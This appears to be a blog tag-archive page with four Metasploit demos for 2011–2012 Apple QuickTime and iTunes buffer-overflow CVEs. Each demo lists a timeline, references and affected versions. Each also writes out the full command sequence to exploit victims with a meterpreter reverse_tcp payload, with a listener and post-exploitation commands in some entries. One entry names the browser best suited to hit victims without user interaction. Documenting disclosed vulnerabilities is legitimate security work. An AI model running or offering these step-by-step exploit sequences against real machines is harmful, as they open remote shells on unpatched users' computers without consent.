Tag Archives: QuickTime

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo

Timeline :

Vulnerability fixed, without notice of the vulnerability, in product the 2012-06-11
Vulnerability discovered by Rh0
Public release of the vulnerability the 2012-06-20
Metasploit PoC provided the 2012-06-20

PoC provided by :

Rh0
sinn3r

Reference(s) :

EDB-ID-19322
HT5318
OSVDB-83220
Rh0

Affected version(s) :

iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3

Tested on Windows XP Pro SP3 with :

Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56

Description :

This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes will copy the content after “#EXTINF:” without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer’s boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware the victim’s browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also spits a warning. Safari would be an ideal target, because it will open the link without any user interaction.

Commands :

use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player previous to version 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo